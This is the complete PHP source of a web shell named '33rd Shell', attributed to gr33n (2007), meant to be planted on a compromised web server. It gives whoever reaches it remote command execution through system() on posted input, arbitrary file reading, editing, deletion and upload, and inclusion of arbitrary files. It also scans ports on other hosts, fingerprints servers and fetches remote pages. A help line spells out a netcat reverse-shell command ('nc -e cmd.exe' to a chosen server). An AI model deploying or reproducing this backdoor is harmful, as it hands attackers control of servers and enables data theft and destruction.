<?
// ################################################## ############################################
//
// .:. 33rd Shell .:.
// . . . by:gr33n . . .
//
// ################################################## ############################################
// Props to who ever made this, im sorry while editing i forgot who this belongs to, but job well done
// Thanks to milw0rm for ...well... no need to explain.
// Thanks to G0t-root for hosting informative services ;)
// Shouts to t3lnet, chatc, HL:1, retardwithaspork, fae, naturalp0rnkiller.
// edited by: gr33n (gr33n.org)
//-################################################## ############################################
// in this version you will find:
// remote port scanner ( scans a host from the server this script is on)
// remote source getter ( gets source of a web page from the host this script is on)
// server software ID ( returns the web-server software a remote server is running )
// and all the standard tools one might find in a php shell.
// ################################################## ############################################
//
// Default Changes (this is what you wanna change when u edit this file)
//
// ################################################## ############################################
$owner = "some hacker."; // Insert your nick
$version = ".33.1 PUBLIC "; // The version
// ################################################## ############################################
?>
<style type="text/css">
<!--
body {
background-color: #000000;
background-repeat: repeat;
}
body,td,th {
color: #009900;
}
a:link {
color: #00FF00;
}
a:visited {
color: #009900;
}
-->
</style><body alink="#000000">
<style type="text/css">
body{
cursor:crosshair
}
</style>
<div align="center" style="width: 100%; height: 100">
<p><font face="Webdings" size="6">Ò</font> <font size="8"> 33rd Shell</font><font face="Webdings" size="6">Ò</font></p>
<p><font face='Verdana' style='font-size: 8pt'><?php echo "Shell By: $owner"; ?></font></p>
</div><b><u></u></b>
<hr color="#000000" size="2,5">
<div align="center">
<center>
<p>
<?php
// Get Dir Var
$dir = $_GET["d"];
if(!isset($dir)) {
$dir = "./";
}
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
} else {
print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
}
?>
<font face="Webdings" size="6">Í</font></p>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#003399">
<p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center">
<font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
<br />
<b>Shell:</b> <? echo __FILE__ ?>
<br>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
<b>Server Name:</b> <? echo $SERVER_NAME ?><br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?></font></tr>
</table><br />
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
<tr>
<td width="49%" height="25" bgcolor="#003399" valign="middle">
<p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
<td width="51%" height="26" bgcolor="#003399" valign="middle">
<p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center"><form method="post">
<p align="center">
<br>
<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
<br>
<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
<br><input type="submit" value="Execute!"><br>
<br></p>
</form>
<p align="center">
<textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
<br>
<font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect
back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
</i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><form enctype="multipart/form-data" method="post">
<p align="center"><br>
<br>
<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
<br>
<input type="file" name="file" size="20"><br>
<br>
<font style="font-size: 5pt"> </font><br>
<input type="submit" value="Upload File!"> <br>
</p>
</form>
<?php
function check_file()
{
global $file_name, $filename;
$backupstring = "copy_of_";
$filename = $backupstring."$filename";
if( file_exists($filename))
{
check_file();
}
}
if(!empty($file))
{
$filename = $file_name;
if( file_exists($file_name))
{
check_file();
echo "<p align=center>File already exist</p>";
}
else
{
copy($file,"$filename");
if( file_exists($filename))
{
echo "<p align=center>File uploaded successful</p>";
}
elseif(! file_exists($filename))
{
echo "<p align=center>File not found</p>";
}
}
}
?></td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="25" bgcolor="#003366">
<p align="center"><font face="Verdana" size="2">[ Directories ]</font></td>
<td width="51%" height="19" bgcolor="#003366"><p align="center"><font face="Verdana" size="2">[ File Viewer ]</font></td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center">
<div align="center" style="overflow:auto; width:99%; height:175">
<?
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if ((filetype($dir . $file)) == "dir") {
echo "<b><a href='".$_SERVER["PHP_SELF"]."?d=".$dir.$file."/'>".$file."</a></b><br />\n";
} else {
echo "<a href='".$_SERVER["PHP_SELF"]."?r=".$dir.$file."&d=".$dir."'>".$file."</a><br />\n";
}
}
closedir($dh);
}
}
?>
</div>
<p align="center"></td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
<form name="frm">
<p align="center"><textarea name="filvw" rows="13" cols="55"><?
@$read = $_GET["r"];
if(isset($read)) {
@$handle = fopen($read, "r");
@$contents = fread($handle, filesize($read));
@fclose($handle);
if ($contents == "") {
echo "No file loaded...";
exit();
}
echo htmlentities($contents);
}
?></textarea><br>
<br>
<input type="button" onClick="document.frm.filvw.rows='30';" name="resize" style="width: 34; height: 26" value="+">
<input type="button" onClick="document.frm.filvw.rows='13';" name="normalize" style="width: 34; height: 26" value="-"><br>
</p>
</form>
</p>
</td>
</tr>
<tr>
<td width="49%" height="25" bgcolor="#003366">
<p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
<td width="51%" height="19" bgcolor="#003366">
<p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
</tr>
<tr>
<td width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center"><?
$scriptname = $_SERVER['SCRIPT_NAME'];
$filename = $_POST["filename"];
if($_POST["submit"] == "Open")
{
if(file_exists($filename))
{
$filecontents = htmlentities(file_get_contents($filename));
if(!$filecontents)
$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Delete")
{
if(file_exists($filename))
{
if(unlink($filename))
$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
else
$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Save")
{
$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
if(file_exists($filename))
unlink($filename);
$handle = fopen($filename, "w");
if(!$handle)
$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
else
{
if(!fwrite($handle, $filecontents))
$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
fclose($handle);
}
$filecontents = htmlentities($filecontents);
}
else
{
$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
}
?>
<table border="0" align="center">
<tr>
<td>
<table width="100%" border="0">
<tr>
<td>
<form method="post" action="<?echo $scriptname;?>">
<input name="filename" type="text" value="<?echo $filename;?>" size="20">
<input type="submit" name="submit" value="Open">
<input type="submit" name="submit" value="Delete">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<font face="Verdana" style="font-size: 11pt">
<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
<input type="submit" name="submit" value="Save">
<input type="reset" value="Reset">
</form>
</td>
</tr>
<tr>
<td>
<h2><?echo $status;?></h2>
</td>
</tr>
</table>
<p> </p></td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
<textarea rows="13" cols="55"></textarea><br>
</font><?php @$output = include($_POST['incl']); ?></td>
</tr>
</table>
<table width="100%" height="25" border="1" cellpadding="0" cellspacing="0" bordercolor="#000000" id="AutoNumber1" style="border-collapse: collapse">
<tr>
<td width="1%" height="25" bgcolor="#003366"><p align="center"><font face="Verdana" size="2">[ Port Scanner]</font></td>
</tr>
<tr>
<td width="49%" height="142"><p align="center"><strong>Scan a Host From This Server </strong>
<center>
<form method="POST">
Host:<input type="text" name="host"><br />
Port:<input type="text" name="sport"><br />
End Port:<input type="text" name="eport"><br />
<input type="submit" name="start" value="Start">
</form>
</center>
<p>
<?php
if (isset($_POST['start'])) {
$host = $_POST['host'];
$port = $_POST['sport'];
$eport = $_POST['eport'];
while ($port <= $eport) {
$check = fsockopen($host, $port);
if ($check) {
echo $host . " is up on port: " . $port;
$port++;
}
else {
echo $host . " is not up on port: " . $port;
$port++;
}
}
}
else { }
?>
</p>
</tr>
</table>
</center>
</div>
<table width="100%" height="150" border="1" cellpadding="0" cellspacing="0" bordercolor="#000000" id="AutoNumber1" style="border-collapse: collapse">
<tr>
<td width="1%" height="25" bgcolor="#003366"><p align="center"><font face="Verdana" size="2">[ Server Software ID ]</font></td>
</tr>
<tr>
<td width="49%" height="123"><p align="center"><strong>Remote Server ID </strong>
</head>
<center>
<form method="POST">
Host:<input type="text" name="host" datafld="text" value="Google.com" size="24"><br />
<input type="submit" name="start" value="Start"></form>
</center>
<?php
function get_server_software($domain) {
$fp = fsockopen($domain , 80, $errno, $errstr, 1);
if (!$fp) {
return("");
}
else {
fputs($fp, "HEAD / HTTP/1.1\r\nHost: " . $domain . "\r\n\r\n");
while (!feof($fp)) {
if (preg_match("/\bServer:/", $server = fgets($fp, 256))) {
fclose($fp);
return(substr($server, 8, -2));
}
}
fclose($fp);
}
}
echo "Host is running : " , get_server_software($host);
php?>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#003366"><p align="center"><font face="Verdana" size="2">[ Source Get ]</font></td>
</tr>
<tr>
<td width="49%" height="142"><p align="center"><strong>Source Of A Remote Website. </strong>
<center>
<FORM>
<INPUT TYPE=HIDDEN NAME=action VALUE="query">
<font face="verdana,arial" size="1"><b>
Server:<br><INPUT TYPE="text" NAME=server SIZE="40" VALUE="<?echo $server?>">(no http://)<br>
Specific file:<br><INPUT TYPE="text" NAME="file" SIZE="40">(ie. index.html) <br>
<INPUT TYPE=SUBMIT VALUE=" View Source! ">
</FORM>
</center>
<?php
function get_source($server, $file = "")
{
$data = "";
$query = "GET /$file HTTP/1.0";
$fp = fsockopen($server, 80);
if($fp)
{
fputs($fp, $query."\n\n");
while(!feof($fp))
{
$data .= fread($fp, 1000);
}
fclose($fp);
}
return $data;
}
?>
<?php
if($action=="query")
{
$data = get_source($server, $file);
echo "<font face=\"tahoma\" size=\"2\"></b>Connected To <b>$server</b> on port 80.<br>";
echo "Source of <b>$file</b>: <p><pre><textarea cols=75 rows=25 wrap=\"virtual\">$data</textarea></p></pre>";
}
?>
</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#003366">
<p align="center"><font face="Verdana" size="2">[ Remove Shell ]</font></td>
</tr>
<tr>
<td width="49%" height="142"><p align="center">
<form method="POST">
<p align="center"><font face="Verdana"><font size="2"><b>Type "remove"
to remove the 33rd Shell </b><br>
<br><input name="rm" type="text" size="20"><br>
<br>
</font><input type="submit" value="Remove Me"></font></p>
</form> <? if ($_POST['rm'] == "remove") { unlink(__FILE__); echo "<script>alert('Rootshell by:gr33n);self.location.href='http://gr33n.org';</script>"; } ?> </tr>
</table>
</p>
<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#000000" height="20">
<p align="center"><font face="Verdana" size="2">= 33rd Shell v<?php echo "$version" ?> ©reated 8/10/2007 by: gr33n.org </font> =</td>
</tr>
</table>
</center>
</div>